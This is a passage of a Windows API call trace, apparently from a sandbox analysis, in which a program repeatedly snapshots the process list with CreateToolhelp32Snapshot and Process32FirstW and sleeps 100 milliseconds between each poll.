lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.427] Sleep (dwMilliseconds=0x64) [0273.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x920 [0273.531] Process32FirstW (in: hSnapshot=0x920, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.536] Sleep (dwMilliseconds=0x64) [0273.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x924 [0273.641] Process32FirstW (in: hSnapshot=0x924, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.647] Sleep (dwMilliseconds=0x64) [0273.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x928 [0273.749] Process32FirstW (in: hSnapshot=0x928, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.755] Sleep (dwMilliseconds=0x64) [0273.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x92c [0273.861] Process32FirstW (in: hSnapshot=0x92c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.867] Sleep (dwMilliseconds=0x64) [0273.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x930 [0273.968] Process32FirstW (in: hSnapshot=0x930, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.973] Sleep (dwMilliseconds=0x64) [0274.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x934 [0274.077] Process32FirstW (in: hSnapshot=0x934, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.082] Sleep (dwMilliseconds=0x64) [0274.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x938 [0274.186] Process32FirstW (in: hSnapshot=0x938, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.192] Sleep (dwMilliseconds=0x64) [0274.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x93c [0274.303] Process32FirstW (in: hSnapshot=0x93c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.308] Sleep (dwMilliseconds=0x64) [0274.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x940 [0274.404] Process32FirstW (in: hSnapshot=0x940, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.410] Sleep (dwMilliseconds=0x64) [0274.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x944 [0274.514] Process32FirstW (in: hSnapshot=0x944, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.520] Sleep (dwMilliseconds=0x64) [0274.621] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x948 [0274.623] Process32FirstW (in: hSnapshot=0x948, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.629] Sleep (dwMilliseconds=0x64) [0274.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x94c [0274.733] Process32FirstW (in: hSnapshot=0x94c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.739] Sleep (dwMilliseconds=0x64) [0274.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x950 [0274.841] Process32FirstW (in: hSnapshot=0x950, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.847] Sleep (dwMilliseconds=0x64) [0274.949] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x954 [0274.950] Process32FirstW (in: hSnapshot=0x954, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.956] Sleep (dwMilliseconds=0x64) [0275.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x958 [0275.060] Process32FirstW (in: hSnapshot=0x958, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.065] Sleep (dwMilliseconds=0x64) [0275.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x95c [0275.169] Process32FirstW (in: hSnapshot=0x95c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.175] Sleep (dwMilliseconds=0x64) [0275.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x960 [0275.278] Process32FirstW (in: hSnapshot=0x960, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.284] Sleep (dwMilliseconds=0x64) [0275.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x964 [0275.387] Process32FirstW (in: hSnapshot=0x964, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.393] Sleep (dwMilliseconds=0x64) [0275.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x968 [0275.497] Process32FirstW (in: hSnapshot=0x968, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.502] Sleep (dwMilliseconds=0x64) [0275.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x96c [0275.606] Process32FirstW (in: hSnapshot=0x96c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.611] Sleep (dwMilliseconds=0x64) [0275.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x970 [0275.715] Process32FirstW (in: hSnapshot=0x970, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.720] Sleep (dwMilliseconds=0x64) [0275.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x974 [0275.825] Process32FirstW (in: hSnapshot=0x974, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.830] Sleep (dwMilliseconds=0x64) [0275.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x978 [0275.933] Process32FirstW (in: hSnapshot=0x978, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.939] Sleep (dwMilliseconds=0x64) [0276.041] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x97c [0276.043] Process32FirstW (in: hSnapshot=0x97c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.050] Sleep (dwMilliseconds=0x64) [0276.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x980 [0276.152] Process32FirstW (in: hSnapshot=0x980, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.157] Sleep (dwMilliseconds=0x64) [0276.259] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x984 [0276.261] Process32FirstW (in: hSnapshot=0x984, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.266] Sleep (dwMilliseconds=0x64) [0276.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x988 [0276.370] Process32FirstW (in: hSnapshot=0x988, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.376] Sleep (dwMilliseconds=0x64) [0276.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x98c [0276.480] Process32FirstW (in: hSnapshot=0x98c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.485] Sleep (dwMilliseconds=0x64) [0276.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x990 [0276.588] Process32FirstW (in: hSnapshot=0x990, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.594] Sleep (dwMilliseconds=0x64) [0276.696] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x994 [0276.698] Process32FirstW (in: hSnapshot=0x994, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.703] Sleep (dwMilliseconds=0x64) [0276.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x998 [0276.808] Process32FirstW (in: hSnapshot=0x998, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.814] Sleep (dwMilliseconds=0x64) [0276.915] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x99c [0276.916] Process32FirstW (in: hSnapshot=0x99c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.922] Sleep (dwMilliseconds=0x64) [0277.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9a0 [0277.026] Process32FirstW (in: hSnapshot=0x9a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.031] Sleep (dwMilliseconds=0x64) [0277.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9a4 [0277.134] Process32FirstW (in: hSnapshot=0x9a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.140] Sleep (dwMilliseconds=0x64) [0277.242] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9a8 [0277.244] Process32FirstW (in: hSnapshot=0x9a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.249] Sleep (dwMilliseconds=0x64) [0277.352] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9ac [0277.353] Process32FirstW (in: hSnapshot=0x9ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.359] Sleep (dwMilliseconds=0x64) [0277.461] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9b0 [0277.462] Process32FirstW (in: hSnapshot=0x9b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.468] Sleep (dwMilliseconds=0x64) [0277.571] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9b4 [0277.573] Process32FirstW (in: hSnapshot=0x9b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.578] Sleep (dwMilliseconds=0x64) [0277.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9b8 [0277.680] Process32FirstW (in: hSnapshot=0x9b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.686] Sleep (dwMilliseconds=0x64) [0277.788] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9bc [0277.790] Process32FirstW (in: hSnapshot=0x9bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.795] Sleep (dwMilliseconds=0x64) [0277.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9c0 [0277.901] Process32FirstW (in: hSnapshot=0x9c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.907] Sleep (dwMilliseconds=0x64) [0278.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9c4 [0278.008] Process32FirstW (in: hSnapshot=0x9c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.014] Sleep (dwMilliseconds=0x64) [0278.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9c8 [0278.117] Process32FirstW (in: hSnapshot=0x9c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.123] Sleep (dwMilliseconds=0x64) [0278.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9cc [0278.229] Process32FirstW (in: hSnapshot=0x9cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.235] Sleep (dwMilliseconds=0x64) [0278.334] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9d0 [0278.336] Process32FirstW (in: hSnapshot=0x9d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.341] Sleep (dwMilliseconds=0x64) [0278.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9d4 [0278.445] Process32FirstW (in: hSnapshot=0x9d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.451] Sleep (dwMilliseconds=0x64) [0278.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9d8 [0278.554] Process32FirstW (in: hSnapshot=0x9d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.559] Sleep (dwMilliseconds=0x64) [0278.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9dc [0278.663] Process32FirstW (in: hSnapshot=0x9dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.669] Sleep (dwMilliseconds=0x64) [0278.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0278.772] Process32FirstW (in: hSnapshot=0x9e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.778] Sleep (dwMilliseconds=0x64) [0278.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e4 [0278.881] Process32FirstW (in: hSnapshot=0x9e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.887] Sleep (dwMilliseconds=0x64) [0278.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e8 [0278.991] Process32FirstW (in: hSnapshot=0x9e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.996] Sleep (dwMilliseconds=0x64) [0279.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9ec [0279.101] Process32FirstW (in: hSnapshot=0x9ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.106] Sleep (dwMilliseconds=0x64) [0279.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9f0 [0279.210] Process32FirstW (in: hSnapshot=0x9f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.215] Sleep (dwMilliseconds=0x64) [0279.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9f4 [0279.318] Process32FirstW (in: hSnapshot=0x9f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.324] Sleep (dwMilliseconds=0x64) [0279.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9f8 [0279.428] Process32FirstW (in: hSnapshot=0x9f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.433] Sleep (dwMilliseconds=0x64) [0279.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9fc [0279.537] Process32FirstW (in: hSnapshot=0x9fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.543] Sleep (dwMilliseconds=0x64) [0279.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa00 [0279.646] Process32FirstW (in: hSnapshot=0xa00, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.651] Sleep (dwMilliseconds=0x64) [0279.754] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa04 [0279.755] Process32FirstW (in: hSnapshot=0xa04, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.761] Sleep (dwMilliseconds=0x64) [0279.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa08 [0279.865] Process32FirstW (in: hSnapshot=0xa08, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 